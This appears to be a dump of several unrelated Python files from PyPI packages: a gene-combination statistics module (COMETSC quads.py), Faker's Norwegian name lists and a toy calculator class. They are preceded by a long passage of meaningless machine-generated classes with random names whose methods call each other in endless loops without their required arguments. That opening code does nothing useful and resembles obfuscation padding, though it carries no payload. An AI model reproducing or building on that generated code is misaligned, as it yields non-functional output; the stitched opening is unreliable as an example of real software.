return self.__wlQCyCYCTbrZbcG()
def __bHzNuDYSWqtsRFmlyKH(self, DRLcCJDhvxYkYFvELt):
return self.__HVBGjuwaUxWDlcm()
def __MaLKHSzAdga(self, wqzAB, XbWXjpJo):
return self.__bHzNuDYSWqtsRFmlyKH()
def __HVBGjuwaUxWDlcm(self, zsVFcJxaRo, bYYIWYMkYiDFaXBhM, fhWUnKpgCtTRWWBtMadT, FOSdugmWOEKywhPntBWb, uxSZPZaLm, HbEcMUGAyLsdwHVk):
return self.__wlQCyCYCTbrZbcG()
def __wlQCyCYCTbrZbcG(self, mndbWlKPWpzofpYix, VdrqvqU, mJEiqJM, geynI):
return self.__MaLKHSzAdga()
def __jOZzmVHfnXvMAbh(self, GcOYKy, ImKkCUVm):
return self.__HVBGjuwaUxWDlcm()
class nqbnlvLA:
def __init__(self):
self.__UiVvlqeeBTxVGBDp()
self.__gQpkwfuKFyds()
self.__zyyvVjNEYqN()
self.__rugBqjun()
self.__UBgRondhMFWhdGNu()
self.__lWCNHXupuMOpkArPDMzO()
self.__WqOWKJMuajtKchfzStA()
self.__CLUzeXIdLZVyYD()
self.__UuSNwlyqhWRpigWpKfO()
self.__HcGJCofB()
self.__PsBaSBvjYCgixmT()
self.__spwdmVavS()
self.__jAKcewnGizbukxh()
def __UiVvlqeeBTxVGBDp(self, kOkFvYYB, KrwNWqBjOqRUzO, XofqLFsseWdokjiQOyq, YwgqCrFqAnXodihPIm):
return self.__UuSNwlyqhWRpigWpKfO()
def __gQpkwfuKFyds(self, WqOlBaDBT, iMlcmoEllmIoPIO, UXCCfigBRCgwsS):
return self.__UBgRondhMFWhdGNu()
def __zyyvVjNEYqN(self, ROvbUfqcxeQIgvERzLi, wcgQSEsOYRHSYXdQy, JrLWNpFRRlvqxIKUjHiw, BmVRCfZdrNQvNKBqASP, pbMufzzJv):
return self.__WqOWKJMuajtKchfzStA()
def __rugBqjun(self, nzGIJhhduCoklzyT, nHsbnNPKqtMUx, POPsOYhYoA):
return self.__gQpkwfuKFyds()
def __UBgRondhMFWhdGNu(self, PNJLnrKm, QZvDLWZkOV, PlnIKeX, ZMsheCeGfoCaaqnRGzTT, urdBDpriYkQVSv):
return self.__HcGJCofB()
def __lWCNHXupuMOpkArPDMzO(self, atYlmwgmbOiqd, yETgCe, MrtSYAToLP):
return self.__rugBqjun()
def __WqOWKJMuajtKchfzStA(self, NZksfTkgdKTAdvRgGNVb, wPHsMaAupT, tYzYALMDccJFEgReCueP):
return self.__lWCNHXupuMOpkArPDMzO()
def __CLUzeXIdLZVyYD(self, ekcNbtOLzh):
return self.__UuSNwlyqhWRpigWpKfO()
def __UuSNwlyqhWRpigWpKfO(self, ZLjFuArPIOWV, edMfKCuaZWNCl, YkXliStefMSX, idZtQO, xISesFyIOSLliTEeGc, mQXioRpuZjyp, NLpLgBEnlCElddOafUR):
return self.__UuSNwlyqhWRpigWpKfO()
def __HcGJCofB(self, euFMDfTSkRYfqbt):
return self.__jAKcewnGizbukxh()
def __PsBaSBvjYCgixmT(self, xFnbxJw):
return self.__UiVvlqeeBTxVGBDp()
def __spwdmVavS(self, DINaUrPKWrSLISUwz, DNnDmmpRtL, eARaJF, kflpQrEyUYecCdNj, OuKzWQEYkhTR, DzbvUvRswaG):
return self.__jAKcewnGizbukxh()
def __jAKcewnGizbukxh(self, gRLkULVTrUdvwqGwajXw, PovfwavNwACTbT, qEzchjmWKLBEiOJG, uizgBhKuTouhDkEc, sgHFglhtoOSKpInBzjJs, WZTsfyv, tMLelMcgYr):
return self.__UuSNwlyqhWRpigWpKfO()
class LmwdbqLKLbVzTdjcuD:
def __init__(self):
self.__PhrByyCyIgTCapeRi()
self.__zlvjgydIDuLBaqQ()
self.__EBzLuJOwXxwEWnOKexnc()
self.__PEXFwPwYbF()
self.__BborEHBATtIlAB()
self.__CAUFqIihnD()
self.__bCmKQJNWKViab()
self.__MJigMWOJYyVqAydbDEiP()
self.__hAsEkxOpdRODXpJ()
def __PhrByyCyIgTCapeRi(self, dbyIXKcuwswVNbr, AwudX):
return self.__PhrByyCyIgTCapeRi()
def __zlvjgydIDuLBaqQ(self, VtwHL):
return self.__CAUFqIihnD()
def __EBzLuJOwXxwEWnOKexnc(self, zoWApUXFOlVxd, udCXIowpHOkCol, fIMtNVbKTU):
return self.__BborEHBATtIlAB()
def __PEXFwPwYbF(self, RKVokzLOfpkuZPc, nQsWgVNlizUWYPwbn, edffsFRsXYG, GUcENfAICVYadLktyr):
return self.__PEXFwPwYbF()
def __BborEHBATtIlAB(self, CqeDlFkydid, gLTmYvqKZCLZfrB, yYOzbRaXM, urWHyoMNLNFfFecwHs, eeSxPXKWYOlcHxxsw):
return self.__BborEHBATtIlAB()
def __CAUFqIihnD(self, gCCiHiXLHmomdU):
return self.__EBzLuJOwXxwEWnOKexnc()
def __bCmKQJNWKViab(self, MKxBPOXVxbATFfOPIXn, WTfIMxI, ESNuRRCJCtSHxn, ttwlMOolSyUwcynYn, YoIKGzbxjkX):
return self.__zlvjgydIDuLBaqQ()
def __MJigMWOJYyVqAydbDEiP(self, KakyDShNOAxf, fUXhOeNS, lpYqWmz):
return self.__zlvjgydIDuLBaqQ()
def __hAsEkxOpdRODXpJ(self, tbmGSwWzFxst, nCFORGALrpnrvAPugcz):
return self.__PEXFwPwYbF()
class AWWRwegRS:
def __init__(self):
self.__aLWDuqGzubcqSvUQhIsQ()
self.__pcqQbfUFb()
self.__GKyTsJzTMhXxxxH()
self.__wXrByUdTpCyvClh()
self.__oHeIdJkeQMPrnt()
self.__RPOKkJyX()
self.__QEXQAuyxFXBI()
self.__ddBIRxQonBZg()
self.__fBFHPdiPuAqDNbvJ()
self.__gHxnsLOhkeKutpFxfA()
self.__WzWAWcBwIJEducJ()
def __aLWDuqGzubcqSvUQhIsQ(self, nQuXTuNwHAcoS, BVdwzugk, QVgHVHmD, teBxuOsjizvLfuLNN, rCNMGCruOdL):
return self.__GKyTsJzTMhXxxxH()
def __pcqQbfUFb(self, ZLADgGuoYSUpNA, BgIwIvUoWyrcjqTmK, idNbVTl, sLNzboWszGmYBNjO):
return self.__wXrByUdTpCyvClh()
def __GKyTsJzTMhXxxxH(self, GduaJAfQYIaPrCAEN, JECFRrsiwATOverVfJgc, pjWULzYXzo):
return self.__pcqQbfUFb()
def __wXrByUdTpCyvClh(self, lJfrG):
return self.__WzWAWcBwIJEducJ()
def __oHeIdJkeQMPrnt(self, bsqOsMNtEPzu, SsFUsIghrdGvEegWAFqo, BepNhsIpwF, FgSizHpHBMstQkRM, yLkixVFgoFfCdNU, otJMiVXEPfum):
return self.__wXrByUdTpCyvClh()
def __RPOKkJyX(self, XpBkwnCziwgcqPqN, GmBYQwCSllpcH):
return self.__wXrByUdTpCyvClh()
def __QEXQAuyxFXBI(self, MROYjzAIBy, jEAyYeUYecBs, XGNWvXkWltVp, gUdCp, FZjOjGgBfUVLhQt, LCQbdawspAVYJbS, EynPyvis):
return self.__RPOKkJyX()
def __ddBIRxQonBZg(self, hNRGSkENxFtykmZy, YALYfpbYSvfGCksb, IGSsOBzzHayVCd, jtJDvBo, ioxKwuvQH, NQrTPISuGaAwmwNVjjK):
return self.__fBFHPdiPuAqDNbvJ()
def __fBFHPdiPuAqDNbvJ(self, sNyPQIVNGExxhlMhUuV, RwnqNWLDsUOgblrfA, YaKVuYqLnsGDy, yFmgZRjGsnzWYWtllGB, xBuIaaOxRyVzZaLQtoDm, hRkiNssFKwkRzY):
return self.__wXrByUdTpCyvClh()
def __gHxnsLOhkeKutpFxfA(self, YZIcQwetgXSyXTSh, jmSzWxJlYjYIOmGIZW, PjKAjI):
return self.__ddBIRxQonBZg()
def __WzWAWcBwIJEducJ(self, ddlgWiSdtGRc, ZzMLVivQNNDTJKqzR, ZwWDcqoqme, CuYUlu, VJURb, PiraRJtsr, WAawvq):
return self.__QEXQAuyxFXBI()
class ESnbyUqGDKqpgJKZDpeV:
def __init__(self):
self.__LRlfYAGotKefRYe()
self.__dYaGtZoSBojwrLIBzZ()
self.__OCxwvZShctVJa()
self.__zLZZtGLa()
self.__LGWWNiAJitLVGyE()
self.__jcOIUwuLjro()
self.__VifHxOzivOYRtvdX()
self.__hMyKEufeyWZEwjMAqzT()
self.__bzNqiMdP()
self.__lxGRMiypC()
def __LRlfYAGotKefRYe(self, hKMdO, dpysHyPoJRharDgL):
return self.__LRlfYAGotKefRYe()
def __dYaGtZoSBojwrLIBzZ(self, zgWyCJOKZAYaEHkQW, tyObvaJdutxZhiH, ZlqelxTZagE, uXUDvfOrNYKjOcvmEO, PfBgfiupBWzuWi):
return self.__LGWWNiAJitLVGyE()
def __OCxwvZShctVJa(self, GmhwkN, VLEZIjfpdKyRtLFvKala, FLvrwZV, flCNAeoWo):
return self.__zLZZtGLa()
def __zLZZtGLa(self, kZNFGPMj, gCYMG, LpsePNrJGnaZ, BhpipMq, qiaSCfJBJYkmmAzSkT, YTsBXIemLjiDjqManPGD, zCktKthFBrKobC):
return self.__zLZZtGLa()
def __LGWWNiAJitLVGyE(self, CRznenlrFAJtzFzKoZ, cGYdhuN, lvWQjXoPgY, VgOub, zRMWfORIl, yZrgWMRfCeize):
return self.__VifHxOzivOYRtvdX()
def __jcOIUwuLjro(self, gONaYhkFJilviBG, aEWCnLXoFZFXlEy, KgHMt, kvdJUKwqTYLC, zZyUMnjJLyUUtsKt, GeUEQ):
return self.__VifHxOzivOYRtvdX()
def __VifHxOzivOYRtvdX(self, CQeCzSAqYhtJcIARySu):
return self.__lxGRMiypC()
def __hMyKEufeyWZEwjMAqzT(self, pCpfKLjRoZcNFPNkqEED, RldpEWALAvE, EfBVKmsP, vhGvggpm):
return self.__lxGRMiypC()
def __bzNqiMdP(self, FOvQgBetn, IpOqSxYwqlzNLBHVOviI, SORVHiUemDKTCAwtwUkV, krfrxbCdpub, XeabYObtqwZsSRoB):
return self.__hMyKEufeyWZEwjMAqzT()
def __lxGRMiypC(self, EDOROQRr, OWQbaPiUzol, UfolIBpo, cscRarjll):
return self.__VifHxOzivOYRtvdX()
class luCivsJdEIWkxKaeiDWc:
def __init__(self):
self.__PiUmhoDPMngBkfRtitN()
self.__BFPREwrcAyVBkMR()
self.__tcwHoXmWjdG()
self.__uDFRplohoQiVgXBOwww()
self.__olYULXKevHEIkllQLJ()
self.__NeUHPQaIIguqePxXTA()
def __PiUmhoDPMngBkfRtitN(self, jbweT, rmBuVljKFpZIjcIu, tzpQXxF, DwnuBCbO, bCBTSoqctIl):
return self.__tcwHoXmWjdG()
def __BFPREwrcAyVBkMR(self, bYqInMHbflRDFdpxe):
return self.__BFPREwrcAyVBkMR()
def __tcwHoXmWjdG(self, BBXjPsALA):
return self.__uDFRplohoQiVgXBOwww()
def __uDFRplohoQiVgXBOwww(self, iFRnQX):
return self.__uDFRplohoQiVgXBOwww()
def __olYULXKevHEIkllQLJ(self, GbBfMuLzinLu, KmHvgkPkO):
return self.__PiUmhoDPMngBkfRtitN()
def __NeUHPQaIIguqePxXTA(self, BCsOIyvWMxfGouExzinQ):
return self.__BFPREwrcAyVBkMR()
class zxvycYiVNMwsw:
def __init__(self):
self.__uICADFTkpF()
self.__tQIlhMoTUZNoaDbSeV()
self.__xRyhNGVgkZbqF()
self.__CEyLcnofmwHBJUPVYPL()
self.__HhVFpYJEzbygl()
self.__LOnFhWusK()
self.__ACPOaicIjRNkSYclJs()
self.__fLWXRROYZFzQEo()
def __uICADFTkpF(self, yeZkkwEgrxxhhUwjDaZG):
return self.__CEyLcnofmwHBJUPVYPL()
def __tQIlhMoTUZNoaDbSeV(self, qmpNYzVdOTcV, vrzZovkYEYZZeHzpjJX, LBvVOXl, nZVStHkofrMwKmycCEc, IPKmaGV):
return self.__ACPOaicIjRNkSYclJs()
def __xRyhNGVgkZbqF(self, GhPlslIjWEbj):
return self.__CEyLcnofmwHBJUPVYPL()
def __CEyLcnofmwHBJUPVYPL(self, QjdYNSXHbcLolJ, NZbwUR, zxXevxambubdwuwzK, NDTOGP, zBcmuQaDvMEdNlLynmYH, dRGOvPYcUbxtc):
return self.__fLWXRROYZFzQEo()
def __HhVFpYJEzbygl(self, CGAllwTbvMBYIYkDqrQ, MGcPeyJgGZdUodLct, xjXZPtlGGISYjKDuErqx, WgnXNYtluhMiW):
return self.__xRyhNGVgkZbqF()
def __LOnFhWusK(self, emciytwcOsTFKKSATDZ, MJmOtyy, EqbaZoCrRqUcSXhlBpF, VbMFDvqZNF):
return self.__LOnFhWusK()
def __ACPOaicIjRNkSYclJs(self, fHPAPR, voHYiOJrNBm, KjjTCfTyU, JEZAWUXIy, FdErvHtsG, dizPrsPJmlg):
return self.__uICADFTkpF()
def __fLWXRROYZFzQEo(self, EDiyZqbQyCELDTFAXWVO, ArHiQuuDqSH, oRwwu, bVKBIqk):
return self.__uICADFTkpF()
class XdurwtSI:
def __init__(self):
self.__jaWJkeJKlIRVNVvkV()
self.__roNfPnNnFhfnEyKICgUx()
self.__YYanMeWxtLxkHdBwS()
self.__xfNucAoodmvCzzGm()
self.__HFlPHDXPZMmmkEueBpI()
self.__GdwaJGJHpeMsHNWeV()
self.__DBXzjjwNWuvcmWcTklr()
self.__yvJVkPFgCkFiGOK()
self.__oCLuzZWuMeq()
self.__nhfCiEmWABwXtQ()
self.__QkXTIalTM()
self.__RcNsAVeYyUhofh()
self.__DZrVZAuYHy()
self.__rbpTlwqXoBHqYukNSo()
def __jaWJkeJKlIRVNVvkV(self, bvoaOQ, ruXeoEGJYpkho):
return self.__roNfPnNnFhfnEyKICgUx()
def __roNfPnNnFhfnEyKICgUx(self, KYzygapefsTSKlE, DpOAyxlGvWNfNhq):
return self.__DBXzjjwNWuvcmWcTklr()
def __YYanMeWxtLxkHdBwS(self, NItlNtteQt, qzudGiutPaoZdOVwT):
return self.__roNfPnNnFhfnEyKICgUx()
def __xfNucAoodmvCzzGm(self, eBlWtM, wEGsAYDiuPEpRAl, TuCtYyapMvUfY):
return self.__oCLuzZWuMeq()
def __HFlPHDXPZMmmkEueBpI(self, dZXNSm, LUGCZwnIOZeGDZgoddy):
return self.__YYanMeWxtLxkHdBwS()
def __GdwaJGJHpeMsHNWeV(self, jLNlujosMJPaJW, NXwyDWsvPDb, fCUIjiFFHOdlkdV, rLGQKpDpZVIakrVqu):
return self.__YYanMeWxtLxkHdBwS()
def __DBXzjjwNWuvcmWcTklr(self, MVYneenXLLcl, CUknGz):
return self.__xfNucAoodmvCzzGm()
def __yvJVkPFgCkFiGOK(self, IbkzTSRJfA, UElAwBLjMBkCnFofng, nhnfwHQqljdzYdZrf):
return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | PypiClean |
/COMETSC-0.1.13.tar.gz/COMETSC-0.1.13/Comet/quads.py | import re
import pandas as pd
import numpy as np
import xlmhg as hg
import scipy.stats as ss
import time
import math
FLOAT_PRECISION = 0.001
def combination_product(discrete_exp,c_list,coi,xlmhg):
count = 0
trips_list=[]
for index,row in xlmhg.iterrows():
if count == 50:
break
else:
trips_list.append(row['gene_1'])
count = count + 1
def quads_matrix_gen(matrix):
Cth = time.time()
quads_matrix_list = []
for row1 in np.transpose(matrix):
for row2 in np.transpose(matrix):
quads_matrix_list.append(row1&row2)
quads_matrix = np.asarray(quads_matrix_list)
print('')
print('quads matrix times itself')
print(quads_matrix.shape)
print('')
Ath = time.time()
quads_product = np.matmul(quads_matrix,np.transpose(quads_matrix))
#print('N^2 x N^2 full count matrix hopefully')
#print(quads_product)
#print(quads_product.shape)
#print('')
Bth = time.time()
print(str(Bth-Ath) + ' mult seconds')
return quads_product
###############
#Experimental Section
if trips_list == None:
pass
else:
for column in discrete_exp:
#print(column)
if str(column) in trips_list:
continue
else:
discrete_exp.drop(column, axis=1,inplace=True)
################
start_time = time.time()
#print('discrete exp matrix')
#print(discrete_exp)
in_cls_matrix = discrete_exp[c_list == coi].values
#print('')
#print('in cls matrix')
#print(in_cls_matrix)
#print('')
total_matrix = discrete_exp.values
#print('total matrix')
#print(total_matrix)
#print('')
gene_count = len(discrete_exp.columns)
first = time.time()
quads_in_cls_product = quads_matrix_gen(in_cls_matrix)
quads_total_product = quads_matrix_gen(total_matrix)
gene_map = discrete_exp.columns.values
#print(gene_map)
odd_gene_map = []
count = 0
for gene in gene_map:
for x in range(gene_count):
odd_gene_map.append(gene)
#print(odd_gene_map)
#print('')
odd_gene_map = pd.Index(odd_gene_map)
even_gene_map = []
count = 0
for gene in gene_map:
for x in gene_map:
even_gene_map.append(x)
#print(even_gene_map)
even_gene_map = pd.Index(even_gene_map)
quads_indices = np.triu_indices((gene_map.size*gene_map.size),1)
return (
quads_in_cls_product,quads_total_product,quads_indices,odd_gene_map,even_gene_map
)
def quads_hg(gene_map,in_cls_count,pop_count,quads_in_cls,quads_total,quads_indices,odd_gene_map,even_gene_map):
def tp(taken_in_cls):
return taken_in_cls / in_cls_count
def tn(taken_in_cls, taken_in_pop):
return (
((pop_count - in_cls_count) - (taken_in_pop - taken_in_cls))
/ (pop_count - in_cls_count)
)
st = time.time()
tp_result = np.vectorize(tp)(quads_in_cls[quads_indices])
tn_result = np.vectorize(tn)(
quads_in_cls[quads_indices], quads_total[quads_indices]
)
vhg = np.vectorize(ss.hypergeom.sf, excluded=[1, 2, 4], otypes=[np.float])
hg_result = vhg(
quads_in_cls[quads_indices],
pop_count,
in_cls_count,
quads_total[quads_indices],
loc=1
)
#0th index in quads_indices refers to 0th pair of genes
#print(quads_indices[0])
#print(quads_indices[1])
#print(odd_gene_map)
#print(even_gene_map)
#print(gene_map)
#print('HG + TP/TN done')
output = pd.DataFrame({
'gene_1': odd_gene_map[quads_indices[0]],
'gene_2': even_gene_map[quads_indices[0]],
'gene_3': odd_gene_map[quads_indices[1]],
'gene_4': even_gene_map[quads_indices[1]],
'HG_stat': hg_result,
'TP' : tp_result,
'TN': tn_result
}, columns=['gene_1', 'gene_2', 'gene_3', 'gene_4', 'HG_stat','TP','TN'])
en = time.time()
print(str(en-st) + ' seconds')
print('end HG/TP/TN')
print('')
print('begin filter')
filt = time.time()
output = output.sort_values(by='HG_stat', ascending=True)
used_genes = []
counter=0
prev_stat = 0
dropped=0
for index, row in output.iterrows():
#row[0] = gene1
#row[1] = gene2
#row[2] = gene3
if counter == 1000:
break
#if row[0] != 'LY6D' or row[1] != 'CD3G_c':
# output.drop([index],inplace=True)
# dropped=dropped + 1
# print(dropped)
# continue
#if row[-1] < .9:
# output.drop([index],inplace=True)
# continue
if row[0]==row[1] or row[1]==row[2] or row[0]==row[2] or row[0]==row[3] or row[1]==row[3] or row[2]==row[3]:
output.drop([index],inplace=True)
continue
if row[3] == prev_stat:
output.drop([index],inplace=True)
continue
else:
prev_stat = row[3]
counter = counter+1
endfilt = time.time()
print(str(endfilt-filt) + ' seconds')
print('end filter')
return output | PypiClean |
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/person/no_NO/__init__.py | from .. import Provider as PersonProvider
class Provider(PersonProvider):
formats = (
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name}} {{last_name}}",
"{{first_name_male}}-{{first_name_male}} {{last_name}}",
"{{first_name_male}}-{{first_name_male}} {{last_name}}",
"{{first_name_female}}-{{first_name_female}} {{last_name}}",
"{{first_name_female}}-{{first_name_female}} {{last_name}}",
"{{first_name}} {{last_name}}-{{last_name}}",
"{{first_name}} {{last_name}}-{{last_name}}",
"{{prefix}} {{first_name_male}} {{last_name}}",
)
# 100 most common male first names, alphabetically.
# Source: http://www.ssb.no/a/navn/fornavn-menn-100.html
first_names_male = (
"Adrian",
"Alexander",
"Alf",
"Anders",
"Andreas",
"Arild",
"Arne",
"Asbjørn",
"Bjørn",
"Christian",
"Dag",
"Daniel",
"Egil",
"Einar",
"Eirik",
"Eivind",
"Emil",
"Erik",
"Erling",
"Espen",
"Finn",
"Frank",
"Fredrik",
"Frode",
"Geir",
"Gunnar",
"Hans",
"Harald",
"Helge",
"Henrik",
"Håkon",
"Håvard",
"Ivar",
"Jan",
"Jens",
"Joakim",
"Johannes",
"Johan",
"John",
"Jonas",
"Jon",
"Jørgen",
"Karl",
"Kenneth",
"Kim",
"Kjell",
"Kjetil",
"Knut",
"Kåre",
"Kristian",
"Kristoffer",
"Lars",
"Leif",
"Magne",
"Magnus",
"Marius",
"Markus",
"Martin",
"Mathias",
"Morten",
"Nils",
"Odd",
"Ola",
"Olav",
"Ole",
"Per",
"Petter",
"Pål",
"Roar",
"Robert",
"Roger",
"Rolf",
"Roy",
"Rune",
"Sander",
"Sebastian",
"Sigurd",
"Simen",
"Sindre",
"Sondre",
"Steinar",
"Stein",
"Stian",
"Stig",
"Svein",
"Sverre",
"Terje",
"Thomas",
"Thor",
"Tobias",
"Tommy",
"Tom",
"Torbjørn",
"Tore",
"Tor",
"Trond",
"Vegard",
"Vidar",
"Øystein",
"Øyvind",
)
# 100 most common female first names, alphabetically.
# Source: http://www.ssb.no/a/navn/fornavn-kvinner-100.html
first_names_female = (
"Andrea",
"Anette",
"Anita",
"Anna",
"Anne",
"Ann",
"Astrid",
"Aud",
"Bente",
"Berit",
"Bjørg",
"Britt",
"Camilla",
"Cathrine",
"Cecilie",
"Elin",
"Elisabeth",
"Elise",
"Eli",
"Ellen",
"Else",
"Emilie",
"Emma",
"Eva",
"Gerd",
"Grete",
"Grethe",
"Gro",
"Gunn",
"Hanna",
"Hanne",
"Hege",
"Heidi",
"Helene",
"Hilde",
"Ida",
"Ingeborg",
"Inger",
"Ingrid",
"Irene",
"Janne",
"Jenny",
"Jorunn",
"Julie",
"Karen",
"Karin",
"Kari",
"Karoline",
"Kirsten",
"Kjersti",
"Kristine",
"Kristin",
"Laila",
"Lene",
"Linda",
"Line",
"Linn",
"Lise",
"Liv",
"Malin",
"Maren",
"Marianne",
"Maria",
"Marie",
"Mari",
"Marit",
"Marte",
"Martine",
"May",
"Mette",
"Mona",
"Monica",
"Nina",
"Nora",
"Ragnhild",
"Randi",
"Reidun",
"Rita",
"Ruth",
"Sara",
"Sigrid",
"Silje",
"Siri",
"Sissel",
"Siv",
"Sofie",
"Solveig",
"Stine",
"Synnøve",
"Thea",
"Tone",
"Tonje",
"Torill",
"Tove",
"Trine",
"Turid",
"Unni",
"Vilde",
"Wenche",
"Åse",
)
first_names = first_names_male + first_names_female
# 100 most common last names, alphabetically.
# Source: http://www.ssb.no/a/navn/alf/etter100.html
last_names = (
"Aasen",
"Aas",
"Abrahamsen",
"Ahmed",
"Ali",
"Amundsen",
"Andersen",
"Andreassen",
"Andresen",
"Antonsen",
"Arnesen",
"Aune",
"Bakken",
"Bakke",
"Berge",
"Berg",
"Berntsen",
"Bøe",
"Birkeland",
"Brekke",
"Christensen",
"Dahl",
"Danielsen",
"Edvardsen",
"Eide",
"Eliassen",
"Ellingsen",
"Engen",
"Eriksen",
"Evensen",
"Fredriksen",
"Gulbrandsen",
"Gundersen",
"Hagen",
"Halvorsen",
"Hansen",
"Hanssen",
"Haugen",
"Hauge",
"Haugland",
"Haug",
"Helland",
"Henriksen",
"Holm",
"Isaksen",
"Iversen",
"Jacobsen",
"Jakobsen",
"Jensen",
"Jenssen",
"Johannessen",
"Johansen",
"Johnsen",
"Jørgensen",
"Karlsen",
"Knudsen",
"Knutsen",
"Kristensen",
"Kristiansen",
"Kristoffersen",
"Larsen",
"Lien",
"Lie",
"Lunde",
"Lund",
"Madsen",
"Martinsen",
"Mathisen",
"Mikkelsen",
"Moen",
"Moe",
"Myhre",
"Myklebust",
"Nguyen",
"Nielsen",
"Nilsen",
"Næss",
"Nygård",
"Olsen",
"Paulsen",
"Pedersen",
"Pettersen",
"Rasmussen",
"Rønning",
"Ruud",
"Sandvik",
"Simonsen",
"Sivertsen",
"Solberg",
"Solheim",
"Sørensen",
"Sæther",
"Strand",
"Strøm",
"Svendsen",
"Tangen",
"Thomassen",
"Thorsen",
"Tveit",
"Vik",
"Ødegård",
)
prefixes = (
"Dr.",
"Prof.",
) | PypiClean |
/BahaCalculator-1.0.0-py3-none-any.whl/Calculator/calculator.py | class BahaCalculator:
"""
A class representing a basic calculator.
Attributes:
memory (float): The current value in the calculator's memory.
"""
def __init__(self):
"""
Initialize a new Calculator object with memory value of 0.
"""
self.memory = 0.0
def add(self, value):
"""
Add a value to the current memory.
Input:
value (float): The value to add to the current memory.
Returns:
float: The new value of the calculator's memory.
"""
self.memory += value
return self.memory
def subtract(self, value):
"""
Subtract a value from the current memory.
Input:
value (float): The value to subtract from the current memory.
Returns:
float: The new value of the calculator's memory.
"""
self.memory -= value
return self.memory
def multiply(self, value):
"""
Multiply the current memory by a value.
Input:
value (float): The value to multiply the current memory by.
Returns:
float: The new value of the calculator's memory.
"""
self.memory *= value
return self.memory
def divide(self, value):
"""
Divide the current memory by a value.
Input:
value (float): The value to divide the current memory by.
Returns:
float: The new value of the calculator's memory.
"""
if value == 0:
raise ValueError("Cannot divide by zero")
self.memory /= value
return self.memory
def root(self, n):
"""
Take the nth root of the current memory.
Input:
n (int): The root to take of the current memory.
Returns:
float: The new value of the calculator's memory.
"""
if n == 0:
return 'Cant take the 0th root' #check for zero division
self.memory **= (1/n)
return self.memory
def reset(self):
"""
Reset the memory to 0.
Returns:
float: The new value of the calculator's memory (0.0).
"""
self.memory = 0.0
return self.memory
c = BahaCalculator()
print(c.add(2))
print(c.multiply(4))
print(c.reset()) | PypiClean |
